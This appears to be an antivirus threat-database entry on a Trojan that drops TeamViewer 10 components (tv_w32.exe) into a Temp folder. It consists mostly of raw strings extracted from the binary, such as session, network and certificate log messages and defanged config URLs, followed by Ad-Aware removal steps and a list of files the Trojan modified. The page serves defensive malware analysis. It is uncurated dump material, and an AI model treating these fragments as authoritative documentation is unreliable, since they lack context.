CSendFileModule_Base::ReplicateAndSortFileInfos: sendfile operational state does not allow for replication of file infos!
RSModuleManager_Server::Received_SubscribeModules: Module Feature not supported: %1% %2%
RSModuleManager_Server::TryAddCommonModule: Module '%1%' is not supported locally!
CSessionIncomingRemoteSupport::Received_RequestSession: Partner protocol version: %1% flags: %2%
CSessionIncomingRemoteSupport::Received_RequestSession: Negotiated protocol version: %1% flags: %2%
CSessionIncomingRemoteSupport::Received_RequestSession: deferring response: %1%
CSessionIncomingRemoteSupport::Received_RequestSession: received unexpected command during session state '%1%'
CSessionIncomingRemoteSupport::RemoteSupportStreamSubscribed: sending previously deferred (cached) response: %1%
CSessionIncomingRemoteSupport::ProcessRSCommand: Command: %1% for module %2% was not handled!
CSessionIncomingRemoteSupport::DestroySession
CSessionIncomingRemoteSupport::Received_UnsubscribeModule
CSessionIncomingRemoteSupport::Received_AskForConfirmation
CSessionIncomingRemoteSupport::SendDeviceInfo
CSessionIncomingRemoteSupport::TrySendSetupComplete
CSessionIncomingRemoteSupport::Received_SubscribeModule
CSessionIncomingRemoteSupport::Received_SubscribeModuleConfirmed
CSessionIncomingRemoteSupport::Received_DiscoverModules
CSessionIncomingRemoteSupport::Received_SendAccessControls
CSessionIncomingRemoteSupport::Received_SetupCompleteResponse
CSessionIncomingRemoteSupport::Received_SetupCompleteResponse: wrong state
CRemoteSupportSession::NewSocketData: status=%1%
CRemoteSupportSession::SendAccessControls: Only supported since RS Version 2
CRemoteSupportSession::SendAccessControls: Sending RCAccessControls: %1%
CRemoteSupportSession::StreamRegisteredCallback: Stream properties not found
CRemoteSupportSession::TrySessionTeardown
CRemoteSupportSession::CreateModuleStream: Stream properties not found
CRemoteSupportSession::StreamRegisteredCallback: Datastream registered with id %1%
CRemoteSupportSession::StreamRegisteredCallback: Stream registration failed with error %1%
CRemoteSupportSession::StreamRegisteredCallback: Unable to register stream, callback result %1%
CRemoteSupportSession::Received_SessionTeardown: wrong state: %1%
CRemoteSupportSession::Received_SessionEnd: wrong state: %1%
CRemoteSupportSession::CreateModuleStream: registration already triggered - pending
CRemoteSupportSession::CreateModuleStream: registration already triggered
CRemoteSupportSession::SendAccessControls: connect param is null
CRemoteSupportSession::ApplyRemoteAccessControls: Only supported since RS Version 2
CRemoteSupportSession::Received_SendAccessControls: module manager is not available!
CRemoteSupportSession::Received_SendAccessControls: SendFile module was not created within automated SendFile-session, initiating shutdown!
CRemoteSupportSession::ForwardToModuleManager: module manager is not available!
CRemoteSupportSession::ProcessTVCommand: Command: %1% was not handled!
CRemoteSupportSession::SendBCommand: Send failed
CRemoteSupportSession::SendBCommand: %1%
CRemoteSupportSession::StartSessionEndTimeout: started teardown phase watchdog (%1% sec)
CRemoteSupportSession::TimerCallbackSessionEnd
CRemoteSupportSession::TimerCallbackSessionEnd: returned from waiting for pending commands, set state ended.
CRemoteSupportSession::ForwardToModuleManager: Received BCommand %1% in wrong session state: %2%
CRemoteSupportSession::StartTeardownTimeoutTimer: started teardown phase watchdog (%1% sec)
CRemoteSupportSession::TimerCallbackSessionTeardown
CRemoteSupportSession::TimerCallbackSessionTeardown: wrong session state: %1%
CRemoteSupportSession::TimerCallbackSessionTeardown: returned from waiting for pending commands, continuing with teardown.
CRemoteSupportSession::StartSetupTimeoutTimer: started setup phase watchdog (%1% sec)
CRemoteSupportSession::TimerCallbackSessionSetup
CRemoteSupportSession::TimerCallbackSessionSetup: wrong session state: %1%
CRemoteSupportSession::TimerCallbackSessionSetup: setup phase did not complete in time, initiating teardown!
CRemoteSupportSession::GetStreamIDForStreamTypeWithCaching: stream type '%1%' not found
CRemoteSupportSession::RemoteSupportStreamSubscribed: Datastream registered with id %1%
CRemoteSupportSession::RemoteSupportStreamSubscribed: StreamRegisteredCallback %1% not found for type %2%
CRemoteSupportSession::RemoteSupportStreamSubscribed: StreamType_Unknown
CRemoteSupportSession::TeardownSession: wrong state: %1%
CRemoteSupportSession::DestroySession: wrong state: %1%
CRemoteSupportSession::GetStreamIDForStreamTypeWithCaching: StreamType_RS_Logs
CRemoteSupportSession::GetStreamIDForStreamTypeWithCaching: caching command %1% for stream type '%2%'
CRemoteSupportSession::SendSessionTeardown: state: %1%
CRemoteSupportSession::SendSessionTeardownResponse: source: %1%
CRemoteSupportSession::SendSessionEnd
CRemoteSupportSession::setState: new: %1% old: %2%
RSModule::setFeatureFlags: skipped - flags not supported
MWC_PASSWORD
MSL_MSG
MMC_IN_PORT
MMC_EMAILAUTH_HTTPMD5
MMC_EMAILAUTH_PASSWORD
MMC_OUT_PORT
RSModuleType_PushURL
hXXps://configdl.teamviewer.com/configs/
hXXps://configdl.teamviewer.com/rev/
hXXps://configdl-test.teamviewer.com/configs/
hXXps://configdl-test.teamviewer.com/rev/
CustomConfigurationUpdater::DownloadRevisionNumber: Failed to download configuration. Result: %1%, Http code: %2%
TeamViewer.json
TeamViewer.sig
meeting/meetingpassword
logging/importsettings
logging/logincomingconnections
partnerlist/passwordsecurity
CustomConfigurationUpdaterImplWin::RemoveInitialConfigurationId: could not remove installation configuration id key
PartnerPassword
CustomConfigurationIniWin::CheckSignatures: Portable version detected.
CustomConfigurationIniWin::CheckIniModule: The configuration can't be used with this executable. Expected: %1% module
importsettings
logo.png
SendLegacyChatCommands::JoinChat
HttpDownload::Open(): failed to open %1%
HttpDownload::ReceiveHandler(): write() failed for chunk of length %1% at position %2%
HttpDownload::Finish(): removing %1% failed: %2%
CMeetingControl::CmdMeetingControl() deserialize CCommand: len=%1% deserialized=%2%
CMeetingControl[%1%]::CmdMeetingControl(): Received CCommand from other MeetingControl for unknown partner: %2%
CMeetingControl[%1%]::CmdDataStream(): cmd.ulLength=%2%
CMeetingControl[%1%]::CmdDataStream(): headerlen=%2% smaller than tDataStreamHeaderSizeV1
CMeetingControl[%1%]::CmdMeetingControl(): denied, RemoteSessionID %2%
CMeetingControl[%1%]::CmdDataStream(): cmd.ulLength=%2%, but headerlen=%3%
CMeetingControl[%1%]::CmdDataStream(): invalid StreamID=%2%, discarding %3% bytes
HttpRequestImpl::CurlRewindCallback(): rewind failed
HttpRequestImpl::CurlRewindCallback(): can't rewind without rewind callback
HttpClientImpl::InternalCancelAllRequests(): Discarding %1% pending requests!
HttpClientImpl::InternalCancelAllRequests(): Discarding %1% queued requests!
HttpRequestImpl::CurlFinished(): curl request failed: %1% (%2%), %3%
HttpRequestImpl::CurlFinished: CONNECT succeeded but couldn't extract socket
HttpRequestImpl::CurlHeaderCallback(): invalid header line: '%s'
HttpRequestImpl::CurlHeaderCallback(): header folding not supported in header line: '%s'
HttpRequestImpl::Delete: request wasn't finished yet, cancelling
HttpRequestImpl::InternalStart: CurlEasy::Setup failed: %1%
HttpRequestImpl::Enqueue: request was already cancelled (or started more than once), status = %1%
CurlEasy::Setup(): curl_easy_setopt(%1%) failed: %2%
CurlEasy::GetResponseCode() : curl_easy_getinfo(CURLINFO_RESPONSE_CODE) failed: %1%
CurlEasy::GetDownloadSize() : curl_easy_getinfo(CURLINFO_SIZE_DOWNLOAD) failed: %1%
CurlEasy::GetConnectCode() : curl_easy_getinfo(CURLINFO_HTTP_CONNECTCODE) failed: %1%
CurlEasy::GetUploadSize() : curl_easy_getinfo(CURLINFO_SIZE_UPLOAD) failed: %1%
CurlEasy::CurlSeekCallback(): called with unexpected values! origin=%1% offset=%2%
CurlMultiShared::Attach(): curl_multi_add_handle() failed: %1%
CurlMultiShared::Attach(): curl_easy_setopt(%1%) failed: %2%
CurlMultiShared::GetEasyHandle(): curl_easy_init failed
CurlMultiShared::RunMultiSocketActionTimeout(): curl_multi_socket_action() failed: %1%
CurlMultiShared::ExtractConnectSocketFor(): curl didn't release socket
CurlMultiShared::ExtractConnectSocketFor(): No matching socket
CurlMultiShared::AsioSocketCallback(): curl_multi_socket_action() failed: %1%
CurlMultiShared::AsioSocketCallback(): Error: %1% on socket %2%.
CurlMultiShared::ExtractConnectSocketFor(): Too many matching sockets
CurlMultiShared::CloseSocket(): Error %1% while closing socket
CurlMultiShared::CurlOpensocketCallback(): creating socket failed: %1%
CurlMultiShared::CurlOpensocketCallback(): unsupported socket protocol %1%
CurlMultiShared::CurlOpensocketCallback(): socket %1% doesn't exists / was already closed in curl CloseSocket callback
CurlMultiShared::CurlOpensocketCallback(): new native handle already/still exists in map
CurlMultiShared::CurlSocketCallback() : curl_multi_assign failed: %1%
CurlMultiShared::CurlSocketCallback: unknown socket
CurlMultiShared::CurlOpensocketCallback(): unsupported socket type %1%
CurlMultiShared::CurlMultiTimerCallback(): canceling timer failed: %1%
CurlMultiFree() : curl_multi_cleanup failed: %1%
CurlSharedFree() : curl_share_cleanup failed: %1%
CTcpProcessConnector::HandleRead(): Socket gracefully closed (PID=%1%)
CTcpProcessConnector::HandleRead(): Connection broken (PID=%1%, Error=%2%)
CTcpProcessConnector::HandleRead(): ERROR_SEM_TIMEOUT
CTcpProcessConnector::HandleRead(): m_EventFunction is null
TcpProcessConnector.StartClient: async_connect failed with system error %1%. Exception text: %2%
, tcp?
Local TCP connection failed with error %1%
Local TCP connection established
CTcpProcessConnector::ReadBCommand() Received wrong Data from PID %1%, size=%2%, expected %3%. Dump:
CTcpProcessConnector::CTcpProcessConnector() close socket to process %1% returned error %2%: %3%
Opening local TCP connection to %1%:%2%%3%
CTcpProcessConnector::Stop() Shutdown socket to process %1% returned error %2%: %3%
CTcpProcessConnector::CloseConnection(): Shutdown socket returned error %1%: %2%
CTcpProcessConnector::HandleWrite error sending to process %1%: %2%
CTcpProcessConnector::HandleRead error %1% reading from process %2%: %3%
CTcpProcessConnector::CloseConnection(): PID=%1%
CTcpProcessConnector::HandleWrite(): Connection broken (PID=%1%, Error=%2%)
tvrcmd::AckWrapper(): deserialize of data failed from %1%
CRoutedCmdHandler::HandleRouterControlCommand(): NoRoute received for commandID %1% for client %2%
CRoutedCmdHandler::ReceivedCCommand: Deserialize CCommands failed, targetID: %1%, senderID: %2%
CRoutedCmdHandler::ReceivedCCommand: Deserialize CCommand failed, targetID: %1%, senderID: %2%
CRoutedCmdHandler::HandleRouterControlCommand(): Ack received for commandID %1% from client %2%, CmdTargetID: %3%
CRoutedCmdHandler::ReceivedCCommand: Unknown Type %1%, targetID: %2%, senderID: %3%
CRoutedCmdHandler::IncomingCCommand(): length too short: %1% Bytes, Dump:
CRoutedCmdHandler::ReceivedCCommand: Deserialize BCommand failed, targetID: %1%, senderID: %2%
CRoutedCmdHandler::ReceivedCCommand: AddCCommand failed: %1%
RCmdAckMap::AddAckHandler(): Insert failed, CommandID: %1%, TargetID: %2%
RCmdAckMap::RemoveAckHandler(): AckMapEntry not found, CmdID %1%, TargetID %2%, SenderID: %3%, AckResult: %4%, Payload: %5% Bytes
RouterCmd::AddCCommand(): Received beginning of new stream, but previous was not finished. Discard old data (%1% Bytes).
dRouterCmd::AddCCommand(): Discard command (%1% Bytes) because first chunk was not received.
RouterCmd::DeserializeCCmds(): command not finished
RouterCmd::DeserializeCCmd(): command not finished
RouterCmd::AddCCommand(): Received duplicate Command. Discard %1% Bytes.
RouterCmd::DeserializeBCmd(): command not finished
RouterCmd::AddCCommand(): Data remaining (%1% Bytes)
WindowsLanguage
BuddyListAutologin
ListenOnPort80
ListenOnPort5938
WindowsVersion
WindowsCountry
SingleWindowSelected
IsWebConnector
WindowsAuthUsed
ListenOnPort443
OptionsPasswordSafe
ListenPort80Deactivated
UDPoverLAN
UDPExternalPort
UDPRemoteNAT
UDPLocalNAT
SupporterAccountId
UdpToRouterStatus
UdpReestablishmentAttempts
SdkSupportedAppIdentifier
PassiveConnectionType
MaxUDPPunches
UDPHeartbeatLost
UdpActiveDuration
UdpToRouterActiveDuration
CMD_REQUESTCONNECT
CMD_IDENTIFY
CMD_TVCONNECTIONFAILED
CMD_DISCONNECT
CMD_STARTLOGGING
CMD_REQUESTRECONNECT
CMD_OK
CMD_KEEPALIVEREQUEST
CMD_KEEPALIVEBEEP
CMD_TIMEOUT
CMD_MASTERRESPONSE_ENCRYPTED
CMD_MASTERCOMMAND_ENCRYPTED
CMD_CONNECTTOWAITINGTHREAD
CMD_NOPARTNERCONNECT
CMD_REQUESTROUTINGSESSION
CMD_SESSIONMODE
CMD_PINGOK
CMD_PING
CMD_MASTERRESPONSE
CMD_MASTERCOMMAND
CMD_RECONNECT_TO_SESSION
CMD_SESSIONID
CMD_MEETING_CONTROL
CMD_RECONNECT_TO_SESSION_ANSWER
CMD_REQUESTROUTE_BUDDY
CMD_BUDDY_ENCRYPTED
CMD_ENDSESSION
CMD_REQUESTROUTE_ENCRYPTED
CMD_ROUTE_CMD_TO_CLIENT
CMD_KEEPALIVEREQUEST_ANSWER
CMD_BUDDY
CMD_NEW_MASTERLOGIN
CMD_REQUESTKEEPALIVE2
CMD_FAILED
CMD_SENDMODE_UDP
CMD_DISCONNECT_SWITCHEDTOUDP
CMD_CONFIRMENCRYPTION
CMD_REQUESTENCRYPTION
CMD_REQUESTNOENCRYPTION
CMD_ENCRYPTIONREQUESTFAILED
CMD_DATA
CMD_REQUEST_UDP_TO_ROUTER
CMD_DATA_ENCRYPTED
CMD_DATA2
CMD_ACK
CMD_CONGESTION_CONTROL
CMD_UDPPING
CMD_BANDWIDTH_TEST
CMD_MEETING_AUTHENTICATION
CMD_CARRIER_SWITCH
CMD_PARTNERRECONNECT
CMD_ROUTERCMD
CMD_REQUESTENCRYPTION2
CMD_UDP_FLUSHSENDBUFFER
CMD_UDP_RESENDPACKETS
CMD_DATA_DIRECTED
CMD_UDP_PROTECTEDCCOMMAND
CMD_UDP_ACKPACKETS
CMD_DATA4
CMD_DATA3_ACKPACKET
CMD_UDP_HEARTBEAT
CMD_DATA_STREAM
CMD_DATA3
CMD_UDPFLOWCONTROL
CMD_DATA3_RESENDPACKETS
CMD_DATA3_ENCRYPTED
%Y%m%d%H%M%S%F
%Y-%b-%d %H:%M:%S%F %ZP
RSCmdSubscribeModulesConfirmed
RSCmdSubscribeModulesResponse
RSCmdUnsubscribeModules
RSCmdSubscribeModulesConfirmedResponse
RSCmdSetupComplete
RSCmdDiscoverModulesResponse
RSCmdSubscribeModules
RSCmdSetupCompleteResponse
RSCmdRequestSession
RSCmdEmpty
RSCmdDiscoverModules
RSCmdRequestSessionResponse
RSCmdAppStateUpdate
RSCmdRequestProvidedFeaturesResponse
RSCmdRequestInstalledAppsResponse
RSCmdRequestInstalledApps
RSCmdDiscoverProvidedFeatures
RSCmdOpenUri
RSCmdRequestProvidedFeatures
RSCmdDiscoverProvidedFeaturesResponse
RSCmdDeviceInfo
RSCmdSessionEnd
RSCmdNudge
RSCmdMonitorData
RSCmdSessionTeardown
RSCmdUnsubscribeModulesResponse
RSCmdSessionSummary
RSCmdSessionTeardownResponse
RSCmdSetProcessUpdateInterval
RSCmdRequestProcessIconResponse
RSCmdWifiConfigurationOperation
RSCmdSetProcessUpdateIntervalResponse
RSCmdRequestStopProcesses
RSCmdRequestRunningProcessesResponse
RSCmdRequestProcessIcon
RSCmdRequestStopProcessesResponse
RSCmdRequestAppUninstallationResponse
RSCmdRequestAppUninstallation
RSCmdRequestRunningProcesses
RSCmdProcessStateUpdate
RSCmdRequestAppIconResponse
RSCmdRequestAppIcon
RSCmdRequestAppInstallationResponse
RSCmdRequestAppInstallation
RSCmdRequestAllLastMonitorData
RSCmdMobileConfigurationResponse
RSCmdSendFileStatisticsUpdate
RSCmdSendAccessControls
RSCmdExchangeConfigurationOperation
RSCmdEmailConfigurationOperationResponse
RSCmdMobileConfiguration
RSCmdExchangeConfigurationOperationResponse
RSCmdRequestScreenshot
RSCmdRequestSystemLogUpdateResponse
RSCmdEmailConfigurationOperation
RSCmdRequestScreenshotResponse
RSCmdRequestSystemLog
RSCmdWifiConfigurationOperationResponse
RSCmdRequestSystemLogUpdate
RSCmdRequestSystemLogResponse
RSCmdExpandScreenGrabbingResponse
RSCmdAskConfirmation
RSCmdSendFileAllFilesReceived
RSCmdExpandScreenGrabbing
RSCmdAskConfirmationResponse
IPEvent: Error creating windows events %1%
ConfigurationHub::SetDecisionDataValueInternal(%1%): Cannot set %2% because type %3% is not supported
ControlCenterImplementationInterface::AccountInfo::Deserialize : could not deserialize MAC key
ControlCenterImplementationInterface::AccountInfo::Deserialize : could not deserialize signatureKey
ControlCenterIPCbase::HandleSendCallback(): Could not deserialize innerBcmd
RSCommandAccessControlHelper::ApplyAccessControlFromRSCommand: cmd is no RSCmdSendAccessControls
CIniPropertyExporter::ConvertTByteArrayTuple
CIniPropertyExporter::ConvertTByteArrayTuple: invalid name/value format <%1%>
Import INI: invalid property format <%1%>
Import INI: F_EncryptedPadding invalid property format <%1%>
Import INI, F_EncryptedPadding
Import INI: invalid name/value format <%1$=%2%>
Import INI: unknown property name<%1%>
Import INI, F_EncryptedPadding, DecryptByteArray()
connecttcp() SO_RCVBUF error:
connecttcp(): connect.error:
connecttcp() SO_SNDBUF set to
connecttcp.ResolveHost
ConnTcp: m_hostname is empty
connecttcp() SO_SNDBUF error:
ConnTcp.Resolve.Failed, last WSA error =
connecttcp failed
Connect.RetryHttp, Err=
ConnTcp.NoSocket
ConnTcp.m_Socket.is.not.INVALID_SOCKET socket:
ReOpenUDPSocket bind failed, err=
Connect.RetryTcp, Err=
ReOpenUDPSocket()
SendData.CM_HTTP_OUT: writeDatahttp failed with RetCode
NC.ReadUDP.Failed LE=
WriteData.Failed1
ReceiveDataUDP.NoSocket
SendUDP.Failed, Err=
ReadUDP.Failed2
NC.ReadUDP.Failed1 EC=
SendDataUDP: SendDataUDPInternal result=
SendDataUDP.NoSocket, Err=
SendDataUDPOverPunchingPort bind failed, err=
SendUDP.SavePort.Failed, Err
connectTcp(): select.SOCKET_ERROR:
connectTcp(): connect timedOut to:
connectTcp(): failed connect to:
Read.Failed5 EC=
readData.Error.
ncSocket::NotifySocketTcp(): Not waking up connection thread, because m_NoWakeUp
Read.TimeOutIncrease
Read.Again1 received spurious wakeup or timeout EC=
Read.Failed4
readData.Error.PartnerDisconnect
WriteData.Failed5 EC=
writeData.Disconnect
WriteData.Failed3
writeData.Error.
WriteData.Failed4
FastInit.ReadFailed
FastInit.WriteFailed
sendudp.ResolveHost
/dout.aspx?s=
/din.aspx?s=
NotifySocketTcp(): WSASetEvent failed with error:
WriteHttp.Failed1 EC=
WriteHttp.Resend
WriteHttp.Timeout
writeDatahttp.OpenRequest
CHttp.Conn.Failed
CHttp.Conned
CHttp.Conned.Fast
CHttp.InetSession
SendUDP.Resolve.Failed
CHttp.IConn.
connecthttp.Connect.
ReadHttp.NoFileIn
WriteHttp.PostBlockTimeout timeout=
ReadHttp.SendRequest.Reconnect
ReadHttp.SendRequest.Resend
WriteHttp: Setting LimitForGetInsteadPost to 0
WriteHttp: unable to retrieve HTTP response body, last error =
WriteHttp: HttpEndRequest failed with error
WriteHttp.Failed3 EC=
WriteHttp: HTTP response content length is
WriteHttp: HTTP response status code =
WriteHttp: Retry limit reached
WriteHttp.Reopen
WriteHttp.Failed2 EC=
writeDataHttp.SendRequestEx.
ReadHttp.Failed3
readDatahttp.NoData
ReadHttp.WrongMC
ReadHttp.Timeout
ReadHttp.Retry
readDatahttp.WrongStatus.
HTTP via:
ReadHttp.GetBlockTimeout timeout=
ReadHttp.Resend
ReadHttp.Failed1.
readDatahttp.SendRequest.
ReadHttp.ReceiveResponse.Resend
ReadHttp.SendRequest.
ReadHttp: Could not establish a connection:
ReadHttp.ReceiveResponse.Reconnect
ConnectPort443: CURL RuntimeError
ConnectPort443.Connected
ApplyProxyUser(): failed to set proxy password! LE=
ConnectPort443: proxy auth avail =
ConnectPort443: ShowProxyDialog %1% (user = %2%, impersonating=%3%
Http Responseheaders:
ReadHttp.Failed4.
readDatahttp.NoSuccess.
readDatahttp.Timedout
ReadHttp.Timeout2
PortListening_Port:
Thread.Close.Failed
Thread.Join.Failed
Thread.Create.Failed
UDP statistics:
TM_UDP
StartWT.Bind.FinalFailure P=
SocketListener.startListening: setsockopt(SO_EXCLUSIVEADDRUSE) failed with error
StartWT.PortInUse P=
SocketListener.startListening: socket failed with error
StartWT.Listening P=
SocketListener.startListening: bind failed on port
SockList.IncomingDenied.TCP
SocketListener.startListening: listen failed with error
Lost UDP heartbeat!
PunchingPortListener::ReadHandler receive_from failed, err=%1%
PunchingPortListener::ReadHandler failed, err=%1%
TCP (Port 443)
Tcp_In
Tcp_Out
HttpFast_Out
Http_Out
CCmd2SendCache - packet
CUDPReceiveCache::Add(): (%1%|%2%) size of Cache is %3%
CSpecificBehaviorProtected::ExecuteCCmdSideEffects(): length is only %1% bytes
SecureNetwork::CallbackWithCertificateDataInternal: requesting new certificate, dyngateids changed
SecureNetwork::RequestNewCertificate: no callback
Certificate::Certificate, error parsing Certificate
Key: Type:
CERT_INVALID
CERT_CA
Certificate: Type:
CERT_ACCOUNT
CERT_MACHINE
Certificate::Certificate: Invalid public key:
Invalid Certificate
SecureNetworkImplementation::GetCertificateForMachine: no callback
SecureNetworkImplementation::GetCertificateCallbackHelper(): Invalid reponse: %1%
SecureNetworkImplementation::GetCertificateCallbackHelper(): Error: %1%
SecureNetworkImplementation::ReceivedNewRevocationCheck: could not verify caCertificate with root cert!
SecureNetworkImplementation::ReceivedNewCertificate: Error
SecureNetworkImplementation::RequestNewCertificateInternal
SecureNetworkImplementation::ReceivedNewCertificate: Received sign error: %1%
SecureNetworkImplementation::ReceivedNewCertificate(): Invalid response: %1%
SecureNetworkImplementation::GetCertificateCallbackHelper(): Could not parse Certificate in response
SecureNetworkImplementation::GetCertificateCallbackHelper(): CAProvider could not provide key and returened error: %1%
SecureNetworkInternal::GetCertificateCallbackHelper(): Certificate could not be verified
SecureNetworkImplementation::GetCertificateCallbackHelper(): CertificateInvalid
SecureNetworkConnection::Handle_ClientHello: invalid certificate %1%
SecureNetworkConnection::Handle_ClientHelloInternal: Connection: %1% Certificate could not be verified cert: %2% caCert: %3%
SecureNetworkConnection::Handle_ServerHello: invalid certificate %1%
SecureNetworkConnection::Handle_ServerHello: %1% Certificate could not be verified cert: %2% caCert: %3%
SecureNetworkConnection::Handle_ServerHello: %1% Certificate could not be verified: No CACert
SecureNetworkConnection::Handle_SecureResponse invalid response: %1% cmd: %2%
SecureNetworkConnection::Handle_SecureNetworkError: resetting Connection %1% cmd:%2%
SecureNetworkConnection::UpdateReachableIDs: Dropping requested reachable %1% as it is not in the Certificate %2%
CertificateValidityResult::Check: No CA Certificate present
CertificateValidityResult::Check: certificate not valid
CertificateValidityResult::Check: Signaturecheck failed with:
CertificateValidityResult::Check: Parsing of CARevocationCheckResult_ValidUntil failed with exception:
CertificateVerifier::Verify: Not all required fields are signed: candidate:%1%
CertificateVerifier::Verify: Certificate not signed by expected CA-Certificate: candidate:%1% ca:%2%
CertificateVerifier::Verify: invalid CA Certificate
CertificateVerifier::Verify: Verification failed with SecureNetworkException:
CertificateVerifier::Verify: Verification failed with CryptoException:
MIDHandlingV1: ExecQuery failed with result %1%
PrintingDataAcceptorTCP: could not get partnerid from printer
PrintingDataAcceptorTCP: no stream for partner: %1%
PrintingDataAcceptorTCP::ConsumeCommand: document: %1%
PrintingDataAcceptorTCP::ConsumeCommand: Print job orientation: %1%
PrintingdataAcceptorTCP Received invalid v1 packet with commandid: %1%
PrintingDataAcceptorTCP::ConsumeCommand: Start Command received. Print job %1%, type %2%, printer %3%
PrintingdataAcceptorTCP Received invalid v0 packet with commandid: %1%
PrintingDataAcceptorTCP::DeleteSync: Removing print job %1% from printer %2%
PrintingdataAcceptorTCP Received invalid packet with commandid: %1%
PrintingDataAcceptorTCP::ConsumeCommand: End Command received. PrintJob finished: %1% bytes total, sending to remote printer
PrintingDataAcceptorTCP::ConsumeCommand: Aborting print job %1%
%1%:Unsupported Datatype %2% dropping Printjob %3%
PrintingDataAcceptorTCP: Now sending print job %1% [id:%2%] via stream
PrintingDataAcceptorTCP::ConsumeCommand: Removing print job %1% [id:%2%] from printer %3%
Driver.Invalid.IP
Driver.GetMAC.Failed
Driver.TAP_IOCTL_SET_MEDIA_STATUS.Rejected
1Driver.DHCP.Failed
DriverConnector.Open: DeviceIOControl(MTU) failed
DriverConnector.Open: CreateFile failed with error
QueryVPNRegKey: Subkey '
QueryVPNRegKey: RegEnumKeyEx:
QueryVPNRegKey: RegOpenKeyEx:
QueryVPNRegKey: Could not find registry key for network adapters.
DriverConnector.RemoveIPAddresses: DeleteIPAddress(%1%) failed with error %2%
SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}Driver.GetDriverIPAddress.Memory allocation error
Driver.GetDriverIPAddress.GetAdaptersInfo2.Error =
DriverConnector.Close: CloseHandle failed
Driver.GetDriverIPAddress.GetAdaptersInfo.Error =
DriverConnector.Open: IpRenewAddress(
DriverConnector.Open: FlushIpNetTable(
\DEVICE\TCPIP_
RouterThread.WriteEvent.Failed
RouterThread.ReadEvent.Failed
AuthenticationPublicKey::GetPayload: Could not parse AuthPayload to BCommand
RetryHandle::HandleRetry: Trying Resend to %1% failed with error %2%: %3% Not retrying (%4% retries would remain) Bcmd: %5%
RetryHandle::HandleRetry: Trying Resend to %1% failed with error %2%: %3% retrying (%4% retries remaining) Bcmd: %5%
10.0.47484.0
tv_w32.exe_3792:
.text
`.rdata
@.data
.rsrc
@.reloc
j.Yf;
_tcPVj@
.PjRW
USER32.dll
WINSPOOL.DRV
SHELL32.dll
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
operator
GetProcessWindowStation
CDriverInstaller::Remove(): SetupDiCreateDeviceInfoList() failed %d
CDriverInstaller::Remove(): SetupDiGetDeviceInfoListDetail() failed %d
CDriverInstaller::Remove(): CM_Get_Device_ID_Ex() failed %u
CDriverInstaller::Remove(): SetupDiGetDeviceRegistryProperty() failed %d (1st call, prop %u, id %s)
CDriverInstaller::Remove(): SetupDiGetDeviceRegistryProperty() failed %d (1st call, prop %u)
CDriverInstaller::Remove(): found %s
CDriverInstaller: Remove successful (erase %d devices) successfully
CDriverInstaller::Rescan(): CM_Locate_DevNode_Ex() failed %u
CDriverInstaller::Rescan(): CM_Reenumerate_DevNode_Ex() failed %u
CDriverInstaller::RemoveRescan(): CDriverInstaller::Rescan() failed %d
CDriverInstaller::RemoveRescan(): CDriverInstaller::Remove() failed %d
tv_w32.dll
Could not load dll (err=%d)
Could not get interface (err=%d)
Fatal Error, Cmd overflow detected. Running in inconsistent state.
Error! CmdUndef!
CmdQuitLoader
i/i/i i:i:i.i%6i%6i %s
Loader started with: %s
OpenProcessToken() failed %d
GetTokenInformation(1) failed %d
GetTokenInformation(2) failed %d
ShellExecuteEx() failed %d
Install failed %d
RemoveRescan failed %d
Update failed %d
Rescan failed %d
Remove failed %d
missing port on AddPortMonitor
AddPortMonitor failed %d
AddPortMonitor success
DeletePortMonitor failed %d
DeletePortMonitor success
InstallPrintProcessor failed %d
RemovePrintProcessor failed %d
InstallPrintDriver failed %d
RemovePrintDriver failed %d
PluginManager::GetOutlookAddinState(): received addin state %d
PluginManager::SetOutlookState(%d): Nothing needs to be done.
PluginManager::SetOutlookState(%d): Setting activation state.
PluginManager::WriteOutlookRegKey(): Setting state for LM in %d bit view. Result code is %x.
E:\TeamViewer_Workspace\TeamViewer_10.0_Release\BuildTarget\Release2013\tv_w32exe.pdb
GetAsyncKeyState
MsgWaitForMultipleObjectsEx
ShellExecuteExW
KERNEL32.dll
RegOpenKeyExW
RegCloseKey
ADVAPI32.dll
GetCPInfo
GetProcessHeap
zcÁ
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Teamview\tv_w32.exe
0-1}1
3 404:4}4
< <(<0<8<
; ;$;(;,;0;4;
kernel32.dll
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
portuguese-brazilian
127.0.0.1
,XcvMonitor Standard TCP/IP Port
AddPort
DeletePort
advapi32.dll
setupapi.dll
newdev.dll
cfgmgr32.dll
printui.dll
addportmon
delportmon
--port
TeamViewer10_Hooks.log
SOFTWARE\Microsoft\Office\Outlook\Addins\TeamViewerMeetingAddIn.AddIn
10.0.47484.0
tv_w32.exe
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
tv_w32.exe:3792
%original file name%.exe:2748
rundll32.exe:2360 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\System Volume Information\Syscache.hve.LOG1 (4888 bytes)
C:\Boot\BCD (1792 bytes)
C:\Windows\System32\config\SOFTWARE (33631 bytes)
C:\Windows\ServiceProfiles\LocalService\NTUSER.DAT (1592 bytes)
C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT.LOG1 (1384 bytes)
C:\Users\"%CurrentUserName%"\ntuser.dat.LOG1 (17872 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\UsrClass.dat.LOG1 (5912 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Teamview\Teamviewer_StaticRes.dll (291 bytes)
C:\Windows\System32\config\SECURITY (1120 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Teamview\Teamviewer_Resource_en.dll (323 bytes)
C:\Boot\BCD.LOG (1384 bytes)
C:\$Directory (1264 bytes)
C:\Windows\System32\config\SOFTWARE.LOG1 (28783 bytes)
C:\Windows\System32\config\DEFAULT (5864 bytes)
C:\Windows\System32\config\DEFAULT.LOG1 (6568 bytes)
C:\Windows\System32\config\SYSTEM.LOG1 (372442 bytes)
